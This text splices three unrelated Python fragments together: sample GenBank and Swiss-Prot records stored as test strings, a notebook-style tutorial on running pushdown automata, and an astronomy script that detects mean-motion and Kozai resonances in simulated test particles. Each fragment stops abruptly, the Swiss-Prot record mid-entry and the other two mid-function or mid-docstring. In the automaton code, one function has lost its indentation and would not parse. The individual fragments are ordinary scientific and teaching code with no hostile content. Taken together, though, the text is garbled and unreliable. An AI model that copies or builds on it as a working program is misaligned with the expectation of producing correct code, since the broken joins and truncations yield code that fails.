# Sample GenBank record from here:
# http://www.ncbi.nlm.nih.gov/Sitemap/samplerecord.html
gbk_example = \
"""LOCUS SCU49845 5028 bp DNA PLN 21-JUN-1999
DEFINITION Saccharomyces cerevisiae TCP1-beta gene, partial cds, and Axl2p
(AXL2) and Rev7p (REV7) genes, complete cds.
ACCESSION U49845
VERSION U49845.1 GI:1293613
KEYWORDS .
SOURCE Saccharomyces cerevisiae (baker's yeast)
ORGANISM Saccharomyces cerevisiae
Eukaryota; Fungi; Ascomycota; Saccharomycotina; Saccharomycetes;
Saccharomycetales; Saccharomycetaceae; Saccharomyces.
REFERENCE 1 (bases 1 to 5028)
AUTHORS Torpey,L.E., Gibbs,P.E., Nelson,J. and Lawrence,C.W.
TITLE Cloning and sequence of REV7, a gene whose function is required for
DNA damage-induced mutagenesis in Saccharomyces cerevisiae
JOURNAL Yeast 10 (11), 1503-1509 (1994)
PUBMED 7871890
REFERENCE 2 (bases 1 to 5028)
AUTHORS Roemer,T., Madden,K., Chang,J. and Snyder,M.
TITLE Selection of axial growth sites in yeast requires Axl2p, a novel
plasma membrane glycoprotein
JOURNAL Genes Dev. 10 (7), 777-793 (1996)
PUBMED 8846915
REFERENCE 3 (bases 1 to 5028)
AUTHORS Roemer,T.
TITLE Direct Submission
JOURNAL Submitted (22-FEB-1996) <NAME>, Biology, Yale University, New
Haven, CT, USA
FEATURES Location/Qualifiers
source 1..5028
/organism="Saccharomyces cerevisiae"
/db_xref="taxon:4932"
/chromosome="IX"
/map="9"
CDS <1..206
/codon_start=3
/product="TCP1-beta"
/protein_id="AAA98665.1"
/db_xref="GI:1293614"
/translation="SSIYNGISTSGLDLNNGTIADMRQLGIVESYKLKRAVVSSASEA
AEVLLRVDNIIRARPRTANRQHM"
gene 687..3158
/gene="AXL2"
CDS 687..3158
/gene="AXL2"
/note="plasma membrane glycoprotein"
/codon_start=1
/function="required for axial budding pattern of S.
cerevisiae"
/product="Axl2p"
/protein_id="AAA98666.1"
/db_xref="GI:1293615"
/translation="MTQLQISLLLTATISLLHLVVATPYEAYPIGKQYPPVARVNESF
TFQISNDTYKSSVDKTAQITYNCFDLPSWLSFDSSSRTFSGEPSSDLLSDANTTLYFN
VILEGTDSADSTSLNNTYQFVVTNRPSISLSSDFNLLALLKNYGYTNGKNALKLDPNE
VFNVTFDRSMFTNEESIVSYYGRSQLYNAPLPNWLFFDSGELKFTGTAPVINSAIAPE
TSYSFVIIATDIEGFSAVEVEFELVIGAHQLTTSIQNSLIINVTDTGNVSYDLPLNYV
YLDDDPISSDKLGSINLLDAPDWVALDNATISGSVPDELLGKNSNPANFSVSIYDTYG
DVIYFNFEVVSTTDLFAISSLPNINATRGEWFSYYFLPSQFTDYVNTNVSLEFTNSSQ
DHDWVKFQSSNLTLAGEVPKNFDKLSLGLKANQGSQSQELYFNIIGMDSKITHSNHSA
NATSTRSSHHSTSTSSYTSSTYTAKISSTSAAATSSAPAALPAANKTSSHNKKAVAIA
CGVAIPLGVILVALICFLIFWRRRRENPDDENLPHAISGPDLNNPANKPNQENATPLN
NPFDDDASSYDDTSIARRLAALNTLKLDNHSATESDISSVDEKRDSLSGMNTYNDQFQ
SQSKEELLAKPPVQPPESPFFDPQNRSSSVYMDSEPAVNKSWRYTGNLSPVSDIVRDS
YGSQKTVDTEKLFDLEAPEKEKRTSRDVTMSSLDPWNSNISPSPVRKSVTPSPYNVTK
HRNRHLQNIQDSQSGKNGITPTTMSTSSSDDFVPVKDGENFCWVHSMEPDRRPSKKRL
VDFSNKSNVNVGQVKDIHGRIPEML"
gene complement(3300..4037)
/gene="REV7"
CDS complement(3300..4037)
/gene="REV7"
/codon_start=1
/product="Rev7p"
/protein_id="AAA98667.1"
/db_xref="GI:1293616"
/translation="MNRWVEKWLRVYLKCYINLILFYRNVYPPQSFDYTTYQSFNLPQ
FVPINRHPALIDYIEELILDVLSKLTHVYRFSICIINKKNDLCIEKYVLDFSELQHVD
KDDQIITETEVFDEFRSSLNSLIMHLEKLPKVNDDTITFEAVINAIELELGHKLDRNR
RVDSLEEKAEIERDSNWVKCQEDENLPDNNGFQPPKIKLTSLVGSDVGPLIIHQFSEK
LISGDDKILNGVYSQYEEGESIFGSLF"
ORIGIN
1 gatcctccat atacaacggt atctccacct caggtttaga tctcaacaac ggaaccattg
61 ccgacatgag acagttaggt atcgtcgaga gttacaagct aaaacgagca gtagtcagct
121 ctgcatctga agccgctgaa gttctactaa gggtggataa catcatccgt gcaagaccaa
181 gaaccgccaa tagacaacat atgtaacata tttaggatat acctcgaaaa taataaaccg
241 ccacactgtc attattataa ttagaaacag aacgcaaaaa ttatccacta tataattcaa
301 agacgcgaaa aaaaaagaac aacgcgtcat agaacttttg gcaattcgcg tcacaaataa
361 attttggcaa cttatgtttc ctcttcgagc agtactcgag ccctgtctca agaatgtaat
421 aatacccatc gtaggtatgg ttaaagatag catctccaca acctcaaagc tccttgccga
481 gagtcgccct cctttgtcga gtaattttca cttttcatat gagaacttat tttcttattc
541 tttactctca catcctgtag tgattgacac tgcaacagcc accatcacta gaagaacaga
601 acaattactt aatagaaaaa ttatatcttc ctcgaaacga tttcctgctt ccaacatcta
661 cgtatatcaa gaagcattca cttaccatga cacagcttca gatttcatta ttgctgacag
721 ctactatatc actactccat ctagtagtgg ccacgcccta tgaggcatat cctatcggaa
781 aacaataccc cccagtggca agagtcaatg aatcgtttac atttcaaatt tccaatgata
841 cctataaatc gtctgtagac aagacagctc aaataacata caattgcttc gacttaccga
901 gctggctttc gtttgactct agttctagaa cgttctcagg tgaaccttct tctgacttac
961 tatctgatgc gaacaccacg ttgtatttca atgtaatact cgagggtacg gactctgccg
1021 acagcacgtc tttgaacaat acataccaat ttgttgttac aaaccgtcca tccatctcgc
1081 tatcgtcaga tttcaatcta ttggcgttgt taaaaaacta tggttatact aacggcaaaa
1141 acgctctgaa actagatcct aatgaagtct tcaacgtgac ttttgaccgt tcaatgttca
1201 ctaacgaaga atccattgtg tcgtattacg gacgttctca gttgtataat gcgccgttac
1261 ccaattggct gttcttcgat tctggcgagt tgaagtttac tgggacggca ccggtgataa
1321 actcggcgat tgctccagaa acaagctaca gttttgtcat catcgctaca gacattgaag
1381 gattttctgc cgttgaggta gaattcgaat tagtcatcgg ggctcaccag ttaactacct
1441 ctattcaaaa tagtttgata atcaacgtta ctgacacagg taacgtttca tatgacttac
1501 ctctaaacta tgtttatctc gatgacgatc ctatttcttc tgataaattg ggttctataa
1561 acttattgga tgctccagac tgggtggcat tagataatgc taccatttcc gggtctgtcc
1621 cagatgaatt actcggtaag aactccaatc ctgccaattt ttctgtgtcc atttatgata
1681 cttatggtga tgtgatttat ttcaacttcg aagttgtctc cacaacggat ttgtttgcca
1741 ttagttctct tcccaatatt aacgctacaa ggggtgaatg gttctcctac tattttttgc
1801 cttctcagtt tacagactac gtgaatacaa acgtttcatt agagtttact aattcaagcc
1861 aagaccatga ctgggtgaaa ttccaatcat ctaatttaac attagctgga gaagtgccca
1921 agaatttcga caagctttca ttaggtttga aagcgaacca aggttcacaa tctcaagagc
1981 tatattttaa catcattggc atggattcaa agataactca ctcaaaccac agtgcgaatg
2041 caacgtccac aagaagttct caccactcca cctcaacaag ttcttacaca tcttctactt
2101 acactgcaaa aatttcttct acctccgctg ctgctacttc ttctgctcca gcagcgctgc
2161 cagcagccaa taaaacttca tctcacaata aaaaagcagt agcaattgcg tgcggtgttg
2221 ctatcccatt aggcgttatc ctagtagctc tcatttgctt cctaatattc tggagacgca
2281 gaagggaaaa tccagacgat gaaaacttac cgcatgctat tagtggacct gatttgaata
2341 atcctgcaaa taaaccaaat caagaaaacg ctacaccttt gaacaacccc tttgatgatg
2401 atgcttcctc gtacgatgat acttcaatag caagaagatt ggctgctttg aacactttga
2461 aattggataa ccactctgcc actgaatctg atatttccag cgtggatgaa aagagagatt
2521 ctctatcagg tatgaataca tacaatgatc agttccaatc ccaaagtaaa gaagaattat
2581 tagcaaaacc cccagtacag cctccagaga gcccgttctt tgacccacag aataggtctt
2641 cttctgtgta tatggatagt gaaccagcag taaataaatc ctggcgatat actggcaacc
2701 tgtcaccagt ctctgatatt gtcagagaca gttacggatc acaaaaaact gttgatacag
2761 aaaaactttt cgatttagaa gcaccagaga aggaaaaacg tacgtcaagg gatgtcacta
2821 tgtcttcact ggacccttgg aacagcaata ttagcccttc tcccgtaaga aaatcagtaa
2881 caccatcacc atataacgta acgaagcatc gtaaccgcca cttacaaaat attcaagact
2941 ctcaaagcgg taaaaacgga atcactccca caacaatgtc aacttcatct tctgacgatt
3001 ttgttccggt taaagatggt gaaaattttt gctgggtcca tagcatggaa ccagacagaa
3061 gaccaagtaa gaaaaggtta gtagattttt caaataagag taatgtcaat gttggtcaag
3121 ttaaggacat tcacggacgc atcccagaaa tgctgtgatt atacgcaacg atattttgct
3181 taattttatt ttcctgtttt attttttatt agtggtttac agatacccta tattttattt
3241 agtttttata cttagagaca tttaatttta attccattct tcaaatttca tttttgcact
3301 taaaacaaag atccaaaaat gctctcgccc tcttcatatt gagaatacac tccattcaaa
3361 attttgtcgt caccgctgat taatttttca ctaaactgat gaataatcaa aggccccacg
3421 tcagaaccga ctaaagaagt gagttttatt ttaggaggtt gaaaaccatt attgtctggt
3481 aaattttcat cttcttgaca tttaacccag tttgaatccc tttcaatttc tgctttttcc
3541 tccaaactat cgaccctcct gtttctgtcc aacttatgtc ctagttccaa ttcgatcgca
3601 ttaataactg cttcaaatgt tattgtgtca tcgttgactt taggtaattt ctccaaatgc
3661 ataatcaaac tatttaagga agatcggaat tcgtcgaaca cttcagtttc cgtaatgatc
3721 tgatcgtctt tatccacatg ttgtaattca ctaaaatcta aaacgtattt ttcaatgcat
3781 aaatcgttct ttttattaat aatgcagatg gaaaatctgt aaacgtgcgt taatttagaa
3841 agaacatcca gtataagttc ttctatatag tcaattaaag caggatgcct attaatggga
3901 acgaactgcg gcaagttgaa tgactggtaa gtagtgtagt cgaatgactg aggtgggtat
3961 acatttctat aaaataaaat caaattaatg tagcatttta agtataccct cagccacttc
4021 tctacccatc tattcataaa gctgacgcaa cgattactat tttttttttc ttcttggatc
4081 tcagtcgtcg caaaaacgta taccttcttt ttccgacctt ttttttagct ttctggaaaa
4141 gtttatatta gttaaacagg gtctagtctt agtgtgaaag ctagtggttt cgattgactg
4201 atattaagaa agtggaaatt aaattagtag tgtagacgta tatgcatatg tatttctcgc
4261 ctgtttatgt ttctacgtac ttttgattta tagcaagggg aaaagaaata catactattt
4321 tttggtaaag gtgaaagcat aatgtaaaag ctagaataaa atggacgaaa taaagagagg
4381 cttagttcat cttttttcca aaaagcaccc aatgataata actaaaatga aaaggatttg
4441 ccatctgtca gcaacatcag ttgtgtgagc aataataaaa tcatcacctc cgttgccttt
4501 agcgcgtttg tcgtttgtat cttccgtaat tttagtctta tcaatgggaa tcataaattt
4561 tccaatgaat tagcaatttc gtccaattct ttttgagctt cttcatattt gctttggaat
4621 tcttcgcact tcttttccca ttcatctctt tcttcttcca aagcaacgat ccttctaccc
4681 atttgctcag agttcaaatc ggcctctttc agtttatcca ttgcttcctt cagtttggct
4741 tcactgtctt ctagctgttg ttctagatcc tggtttttct tggtgtagtt ctcattatta
4801 gatctcaagt tattggagtc ttcagccaat tgctttgtat cagacaattg actctctaac
4861 ttctccactt cactgtcgag ttgctcgttt ttagcggaca aagatttaat ctcgttttct
4921 ttttcagtgt tagattgctc taattctttg agctgttctc tcagctcctc atatttttct
4981 tgccatgact cagattctaa ttttaagcta ttcaatttct ctttgatc
//"""
# GenBank format protein (aka GenPept) file from:
# http://www.molecularevolution.org/resources/fileformats/
gbk_example2 = \
"""LOCUS AAD51968 143 aa linear BCT 21-AUG-2001
DEFINITION transcriptional regulator RovA [Yersinia enterocolitica].
ACCESSION AAD51968
VERSION AAD51968.1 GI:5805369
DBSOURCE locus AF171097 accession AF171097.1
KEYWORDS .
SOURCE Yersinia enterocolitica
ORGANISM Yersinia enterocolitica
Bacteria; Proteobacteria; Gammaproteobacteria; Enterobacteriales;
Enterobacteriaceae; Yersinia.
REFERENCE 1 (residues 1 to 143)
AUTHORS Revell,P.A. and Miller,V.L.
TITLE A chromosomally encoded regulator is required for expression of the
Yersinia enterocolitica inv gene and for virulence
JOURNAL Mol. Microbiol. 35 (3), 677-685 (2000)
MEDLINE 20138369
PUBMED 10672189
REFERENCE 2 (residues 1 to 143)
AUTHORS Revell,P.A. and Miller,V.L.
TITLE Direct Submission
JOURNAL Submitted (22-JUL-1999) Molecular Microbiology, Washington
University School of Medicine, Campus Box 8230, 660 South Euclid,
St. Louis, MO 63110, USA
COMMENT Method: conceptual translation.
FEATURES Location/Qualifiers
source 1..143
/organism="Yersinia enterocolitica"
/mol_type="unassigned DNA"
/strain="JB580v"
/serotype="O:8"
/db_xref="taxon:630"
Protein 1..143
/product="transcriptional regulator RovA"
/name="regulates inv expression"
CDS 1..143
/gene="rovA"
/coded_by="AF171097.1:380..811"
/note="regulator of virulence"
/transl_table=11
ORIGIN
1 mestlgsdla rlvrvwrali dhrlkplelt qthwvtlhni nrlppeqsqi qlakaigieq
61 pslvrtldql eekglitrht candrrakri klteqsspii eqvdgvicst rkeilggisp
121 deiellsgli dklerniiql qsk
//"""
swiss_example = \
"""ID 104K_THEAN Reviewed; 893 AA.
AC Q4U9M9;
DT 18-APR-2006, integrated into UniProtKB/Swiss-Prot.
DT 05-JUL-2005, sequence version 1.
DT 31-OCT-2006, entry version 8.
DE 104 kDa microneme-rhoptry antigen precursor (p104).
GN ORFNames=TA08425;
OS Theileria annulata.
OC Eukaryota; Alveolata; Apicomplexa; Piroplasmida; Theileriidae;
OC Theileria.
OX NCBI_TaxID=5874;
RN [1]
RP NUCLEOTIDE SEQUENCE [LARGE SCALE GENOMIC DNA].
RC STRAIN=Ankara;
RX PubMed=15994557; DOI=10.1126/science.1110418;
RA | |
# coding: utf-8
# In[1]:
from jove.SystemImports import *
from jove.TransitionSelectors import *
from jove.DotBashers import chk_consistent_pda
# # Pushdown Automata (PDA)
#
# ## Basic Definitions
#
# Pushdown Automata are structures
#
# $(Q, Sigma, Gamma, Delta, q0, z0, F)$
#
# where
#
# * $Q$ : Finite non-empty set of states
#
# * $Sigma$ : Finite non-empty input alphabet
#
# * $Gamma$ : Finite non-empty stack alphabet (usually subsumes Sigma)
#
# * $Delta$ : A transition function
#
# and $Delta$'s signature is
#
# $(Q \times (Sigma \cup \{\varepsilon\}) \times (Gamma\cup\{\varepsilon\})) \rightarrow 2^{(Q \times Gamma^*)}$
#
# ## Example
#
# We model Delta as a mapping of this form
#
# (q, a, b) -> { (q1,G1s), (q2,G2s), ... }
#
# where
# a gets read
# b gets popped, if non-empty
# Gis gets pushed
# qi becomes the next state
#
# * q0 : Starting state
#
# * z0 : Initial stack's lone contents
#
# - prevents an "accept by
# empty stack" PDA from accepting as soon as it is
# switched on
#
# * F : Finite, possibly empty set of final states
#
# We will define acceptance by final state _or_ empty stack, as will be detailed in the sequel.
#
# ## Instantaneous Description
#
# An instantaneous description (ID) of a PDA is a triple (p, aI, bS).
#
# Now, ID (p, aI, bS) evolves to an ID (q, I, GS)
#
# written
#
# (p, aI, bS) $\vdash$ (q, I, GS)
#
#
# if Delta(p,a,b) contains (q,G)
#
# A PDA accepts by final state if its ID is of the form (p, "", S)
# where p in F.
#
# That is, the input is fully consumed
# and control resides within F. Note that S is arbitrary.
#
# A PDA accepts by empty stack if its ID is of the form (p, "", "")
# at any point (for any p).
#
# ## Design Details of a PDA
#
# To __prevent__ a PDA P whose acceptance is defined via an empty stack
# from accepting "as soon as it is turned on", we put in an
# initial stack letter denoted by P["z0"].
#
# * As of now, P["z0"] is the hash mark, #
#
#     - It does not matter what this character is
#
# - With markdowns, the initial stack contents is always #
#
# * Note that this is only to help-out the user. The user may decide to start with
# an empty stack, which is fine.
#
# * Our preferred initial stack symbol is "z" (lower-case z).
#
#
# # Our coding decisions wrt acceptance
#
# In our coding,
#
# * For PDA, we will require there to be an initial stack symbol
#
# * We will permit acceptance either by final state or empty stack (this will be a
# parameter given to the run_pda function)
#
# * We will require that a PDA always pop something from the stack (but allow zero or more things to be pushed). This way ("zero or more"), emptying the stack becomes possible.
#
# * When we encounter an ID for which acceptance has been noted, that ID will still be expanded if there are moves leading out of it.
#
# # Routines to run PDA
#
# We now devise a routine to run a PDA according to either the "accept by final state" criterion or "accept by empty stack" criterion. We call these "ACCEPT_F" and "ACCEPT_S" with the default being ACCEPT_F. The main difference is that the "final" configurations are collected differently.
# In[2]:
def explore_pda(inp, P, acceptance = 'ACCEPT_F', STKMAX=0, chatty=False):
    """Run PDA P on input inp via run_pda and pretty-print the outcome.

    Prints a rejection summary (with the visited IDs) when no accepting
    configuration exists, otherwise every accepting path found.
    """
    chk_consistent_pda(P)
    (term, final, visited) = run_pda(inp, P, acceptance, STKMAX=STKMAX,
                                     chatty=chatty)
    # Guard clause: no accepting configuration at all.
    if not final:
        print("String " + inp + " rejected by your PDA :-(")
        print("Visited states are:")
        print(visited)
        return
    print("String " + inp + " accepted by your PDA in " +
          str(len(final)) + " ways :-) ")
    print("Here are the ways: ")
    for (fin, path) in final:
        print("Final state ", fin)
        print("Reached as follows:")
        for step in path:
            print("-> ", step)
        print("-> ", fin, ".")
# In[3]:
def run_pda(str, P, acceptance = 'ACCEPT_F', STKMAX=0, chatty=False):
    """Drive PDA P over the input string and collect run results.

    NOTE: the first parameter is (unfortunately) named `str`, shadowing the
    builtin; it is kept for signature compatibility with existing callers.

    Parameters: the input string, a PDA P, the acceptance criterion
    ('ACCEPT_F' = by final state, 'ACCEPT_S' = by empty stack), a stack
    bound STKMAX, and a chatty flag for diagnostic prints.

    Returns (l_term_id_path, l_final_id_path, s_visited_id) so a caller can
    probe terminal IDs, accepting configurations, and visited IDs.
    """
    chk_consistent_pda(P)
    # Initial ID: start state, full input, initial stack symbol; empty path.
    start_id = (P["q0"], str, P["z0"])
    seen = set()
    (l_surv,
     l_term,
     l_final) = classify_l_id_path([(start_id, [])], seen, P, acceptance,
                                   STKMAX=STKMAX)
    rslt = h_run_pda(l_id_path = l_surv,
                     l_term_id_path = l_term,
                     l_final_id_path = l_final,
                     s_visited_id = seen,
                     pda = P,
                     acceptance = acceptance,
                     STKMAX = STKMAX
                    )
    if chatty:
        print("terminal_id_path = ", rslt[0])
        print("final_id_path = ", rslt[1])
        print("visited_ids = ", rslt[2])
    return rslt
# In[4]:
def classify_l_id_path(l_id_path, s_visited_id, P, acceptance, STKMAX):
    """Partition a list of (ID, path) pairs into survivors, terminals and
    finals, using the tagging closures survivor_id / term_id / final_id.

    Each classifier returns (tag, id_path); we keep the id_path of every
    entry carrying the matching tag.
    """
    # Build each classifier once, then apply it to every (ID, path) pair.
    classify_surv = survivor_id(s_visited_id, P, STKMAX=STKMAX)
    classify_term = term_id(s_visited_id, P, STKMAX=STKMAX)
    classify_final = final_id(P, acceptance)
    surv_pool = [classify_surv(idp) for idp in l_id_path]
    term_pool = [classify_term(idp) for idp in l_id_path]
    final_pool = [classify_final(idp) for idp in l_id_path]
    l_surv = [tagged[1] for tagged in surv_pool if tagged[0] == "surv"]
    l_term = [tagged[1] for tagged in term_pool if tagged[0] == "term"]
    l_final = [tagged[1] for tagged in final_pool if tagged[0] == "final"]
    return (l_surv, l_term, l_final)
# In[5]:
def h_run_pda(l_id_path, l_term_id_path, l_final_id_path, s_visited_id,
              pda, acceptance, STKMAX):
    """Worklist loop behind run_pda.

    l_id_path holds only surviving (non-terminal) (ID, path) pairs; that
    invariant is maintained across iterations. Terminal pairs (stuck or
    loopy) accumulate in l_term_id_path, accepting ones in l_final_id_path,
    and every expanded ID is recorded in s_visited_id.

    Returns (l_term_id_path, l_final_id_path, s_visited_id).
    """
    while l_id_path:
        (cur_id, cur_path) = l_id_path[0]
        # Record cur_id as visited (rebinding keeps the caller's set intact).
        s_visited_id = s_visited_id | {cur_id}
        # All one-step successors of cur_id, each carrying the extended path.
        successors = step_pda(cur_id, cur_path, pda)
        if not successors:
            # cur_id fired nothing; drop it and continue with the rest.
            l_id_path = l_id_path[1:]
        else:
            (l_surv,
             l_term,
             l_final) = classify_l_id_path(successors, s_visited_id, pda,
                                           acceptance, STKMAX)
            # Survivors join the worklist; terminals/finals are archived.
            l_id_path = l_id_path[1:] + l_surv
            l_term_id_path = l_term_id_path + l_term
            l_final_id_path = l_final_id_path + l_final
    return (l_term_id_path, l_final_id_path, s_visited_id)
# In[6]:
def interpret_w_eps(q_inp_stk, pda):
"""Helper for step_pda
---
Produce the most liberal interpretation of q_inp_stk for pda
i.e. in (q, inp_str, stk_str), we can ignore inp_str or stk_str.
E.g. if inp_str is "ab", we can consider it to be "" or "a".
The rest of the string will then be "ab" or "b" respectively.
This is done if a move in Delta can process that option.
"""
(q, inp_str, stk_str) = q_inp_stk
inp_interps = cvt_str_to_sym(inp_str) # Diverse interpretations of input
stk_interps | |
__author__ = "<NAME>"
__copyright__ = "Copyright 2020"
__version__ = "1.0.1"
__maintainer__ = "Rabaa"
__email__ = "<EMAIL>"
import numpy as np
import sys
## Class: TestParticle
# Functions: Default Constructor, DataDissection, IdentifyResonance, PrintData
class TestParticle:
    """One simulated test particle read from swift-style 'tp<N>.out' files.

    DataDissection classifies the particle as being in a p:q mean-motion
    resonance (typeOfData == 0) or in Kozai resonance (otherwise), storing
    the results on the instance; IdentifyResonance chains the two checks and
    PrintData appends one summary line to a global output file.
    """
    def __init__(self): # Attributes defined
        # Sentinel values: -999 / False / 'N/A' mean "not yet classified".
        self.Resonant = False
        self.ResonanceType = 'n:n'
        self.Name = 'N/A'
        self.ResonanceCenter = -999
        self.ResonanceAmplitude = -999
        self.AverageSMA = -999 # Average SemiMajor axist
        self.AverageEccentricity = -999
        self.AverageInclination = -999
        self.Kozai = False
        self.SMAamplitude = -999
        self.SMACenter = -999
        self.Index = -1
    ############################################ FUNCTIONS #################################################
    ############################################ DATA DISSECTION #################################################
    # Expects: typeOfData, IndexCount
    # Will do: Alter the Resonance & Kozai attributes of the class, given the write orbital elements
    def DataDissection(self, typeOfData, IndexCount):
        """Classify resonance (typeOfData == 0) or Kozai (else) behaviour.

        Reads 'tp<sys.argv[1]>.out' (nine whitespace columns) and "LN.out"
        (column 8 — presumably the perturber's longitude; confirm against
        the integrator output) from the working directory.
        """
        self.Index = IndexCount
        TestParticleSample = sys.argv[1] # User to choose a test sample using terminal
        with open('tp' + TestParticleSample + ".out") as f: # Counting number of lines
            for line, l in enumerate(f):
                pass
        # NOTE(review): enumerate is zero-based, so this is (line count - 1);
        # the division below subtracts 1 again — confirm the intended
        # off-by-one behaviour against the data format.
        NumberOfLines = line
        # Taking the test point's data from the .out file sequentially
        TestParticleTime, Index, SemiMajorAxis, Eccentricity, Inclination, Omega, omega, AngularPosition, LongitudeTP = np.genfromtxt(
            'tp' + TestParticleSample + ".out", unpack=True)
        Longitude = np.genfromtxt(
            "LN.out", usecols= 8, unpack=True)
        NumberOfLines = (NumberOfLines / (max(Index)+1)) -1 # Dividing the total number of lines by number of test particles, to get steps of one test particle.
        # Matching the orbitals with the index we need
        TestParticleTime = TestParticleTime[Index == IndexCount]
        SemiMajorAxis = SemiMajorAxis[Index == IndexCount]
        Eccentricity = Eccentricity[Index == IndexCount]
        Inclination = Inclination[Index == IndexCount]
        Omega = Omega[Index == IndexCount]
        omega = omega[Index == IndexCount]
        AngularPosition = AngularPosition[Index == IndexCount]
        # Calculating Lambda, Pomega
        Lambda = (Omega + omega + AngularPosition) % 360 # The Lambda for test particles
        Pomega = (Omega + omega) % 360 # The longitude if pericenter in degrees
        # Flags "Specific ones"
        IsItResonant = False # Is it in resonance?
        ResonanceAmplitude = -999 # The Resonance Amplitude
        ResonanceCenter = -999 # The Resonance Center
        ResonanceName = -999 # The Resonance name "Ration"
        IsItKozai = False # Is it Kozai resonance?
        SMAAmplitude = -999 # SemiMajor amplitude
        SMACenter = -999 # SemiMajor center
        # Flags "General ones"
        IsIt = False # Resonance / Kozai ?
        Amplitude = -999 # Phi / SMA
        Center = -999 # Phi / SMA
        Name = -999 # Name of the test particle
        # General flags will be used in the coming loop, Specific flags will then be set at the end, to distinguish Kozai / Resonance
        # list of resonances to check: pp and qq for pp:qq resonance
        pp = [2, 3, 3, 4, 4, 5, 5, 5, 5, 6, 7, 7, 7, 7, 8, 8, 9, 9, 9, 10]
        qq = [1, 1, 2, 1, 3, 1, 2, 3, 4, 1, 1, 2, 3, 4, 1, 3, 1, 2, 4, 1]
        for jj in np.arange(0, len(pp)): # First Loop
            # 30.1 AU is the perturber's semi-major axis (Neptune-like).
            ResSemiMajorAxis = 30.1 * (float(pp[jj]) / float(qq[jj])) ** (
                2. / 3.) # Kepler's Third Law to calculate semimajor axis of the resonance
            # Searching within 2 AUs from the resonance center
            if IsIt == 0 and (ResSemiMajorAxis + 2) > np.average(SemiMajorAxis) > (ResSemiMajorAxis - 2):
                phi = (float(pp[jj]) * Lambda - float(qq[jj]) * Longitude - (float(pp[jj]) - float(qq[jj])) * Pomega) % 360
                AngleRange = np.arange(0, 360, 15) # Array of angles 15 degrees increment each step
                Window = int(0)
                Loop = 0
                if typeOfData == 0:
                    # Dividing the timeline to 10 separate windows Detecting resonance on smaller scales
                    WindowStep = int(NumberOfLines / 10)
                    IsItArray = np.zeros(int(len(
                        phi) / WindowStep)) # Array of 10 binary elements to check for resonance each step '10%' set to zero
                    CenterArray = np.zeros(int(len(
                        phi) / WindowStep)) # Array of 10 binary elements to check the res angle each step '10%' set to zero
                    while Window + WindowStep < len(phi):
                        # Average of the semi-major axis from Current Window -> Next Window
                        WindowAverage = np.average(SemiMajorAxis[Window:Window + WindowStep])
                        if (ResSemiMajorAxis + 2) > WindowAverage > (
                                ResSemiMajorAxis - 2): # Within 2 AUs of Window Average
                            WindowPhi = phi[Window:Window + WindowStep] # Phi of next window
                            AnglePresent = np.zeros(len(AngleRange)) + 1
                            for step in np.arange(0, len(
                                    AngleRange) - 1): # find out where the res angle doesn't go for 15 degrees, proxy for AnglePresent
                                if len(WindowPhi[
                                           (WindowPhi > AngleRange[step]) * (WindowPhi < (AngleRange[step + 1]))]) == 0:
                                    AnglePresent[step] = 0
                            # 180 * mean(AnglePresent) is a libration-amplitude proxy.
                            IsItArray[Loop] = np.average(AnglePresent) * 180.
                            CenterArray[Loop] = np.average(
                                AnglePresent[AnglePresent != 0] * AngleRange[AnglePresent != 0])
                        else:
                            IsItArray[Loop] = 180.
                        Window += WindowStep # Increment Window
                        Loop += 1 # Increment Loop
                    if len(IsItArray[
                               IsItArray < 180.]) > 8: # If 8 out of 10 Windows classified as Resonant
                        IsIt = True
                        Amplitude = np.average(IsItArray)
                        Center = np.average(CenterArray)
                        Name = str(pp[jj]) + ':' + str(qq[jj])
                        MaxCenter = max(CenterArray)
                        MinCenter = min(CenterArray)
                        if (MaxCenter - MinCenter) > 210: # If the centers are too large in difference, it is not resonant
                            IsIt = False
                            Amplitude = -999
                            Center = -999
                        # Stop scanning further p:q ratios once one matched.
                        break
                    else:
                        Amplitude = -999
                        Center = -999
                else:
                    # If checking for Kozai, we only want one window
                    WindowStep = int(NumberOfLines)
                    IsItArray = np.zeros(int(len(
                        omega) / WindowStep)) # For Kozai we check SMA
                    CenterArray = np.zeros(int(len(
                        omega) / WindowStep))
                    while Window + WindowStep < len(SemiMajorAxis):
                        # WindowSMA = SemiMajorAxis[Window:Window + WindowStep] # SMA of next window
                        AnglePresent = np.zeros(len(AngleRange)) + 1
                        for step in np.arange(0, len(
                                AngleRange) - 1): # find out where the res angle doesn't go for 15 degrees, proxy for AnglePresent
                            if len(omega[
                                       (omega > AngleRange[step]) * (omega < (AngleRange[step + 1]))]) == 0:
                                AnglePresent[step] = 0
                        IsItArray[Loop] = np.average(AnglePresent) * 180.
                        CenterArray[Loop] = np.average(
                            AnglePresent[AnglePresent != 0] * AngleRange[AnglePresent != 0])
                        Window += WindowStep # Increment Window
                        Loop += 1 # Increment Loop
                    if len(IsItArray[
                               IsItArray < 180.]) == 1: # If the Window classified as Kozai
                        IsIt = True
                        Amplitude = np.average(IsItArray)
                        Center = np.average(CenterArray)
                        Name = str(pp[jj]) + ':' + str(qq[jj])
                    else:
                        Amplitude = -999
                        Center = -999
        if typeOfData == 0: # Type 0 means we are looking if it was Resonant
            IsItResonant = IsIt
            ResonanceAmplitude = Amplitude
            ResonanceCenter = Center
            ResonanceName = Name
            self.Resonant = IsItResonant
            self.ResonanceAmplitude = ResonanceAmplitude
            self.ResonanceCenter = ResonanceCenter
            self.ResonanceType = ResonanceName
        else: # Else 1 means we are looking if it was Kozai
            IsItKozai = IsIt
            SMAAmplitude = Amplitude
            SMACenter = Center
            self.Kozai = IsItKozai
            self.SMAamplitude = SMAAmplitude
            self.SMACenter = SMACenter
        # End Else
        self.Name = TestParticleSample
        self.AverageEccentricity = np.average(Eccentricity)
        self.AverageInclination = np.average(Inclination)
        self.AverageSMA = np.average(SemiMajorAxis)
        return
    ############################################ IDENTIFY RESONANCE ##############################################
    # Expects: IndexCount
    # Will do: First call to function DataDissection to check if resonant, if resonant, will do second call to check for Kozai
    def IdentifyResonance(self, IndexCount):
        """Run the resonance check; if resonant, additionally check Kozai."""
        # NOTE: the local name `type` shadows the builtin.
        type = 0 # Indicated that the variable Resonant is what we want from DataDissection function
        self.DataDissection(type, IndexCount)
        if self.Resonant == True:
            type = 1 # Indicated that the variable Kozai is what we want from DataDissection function
            self.DataDissection(type, IndexCount)
    ############################################## PRINT DATA ##############################################
    # Expects: IndexCount
    # Will do: Print Data Into a '.out' file Names tp + 'number you entered' + .out
    def PrintData(self, IndexCount ):
        """Append this particle's classification as one line of TextFile.

        NOTE(review): relies on a module-level `TextFile` handle presumably
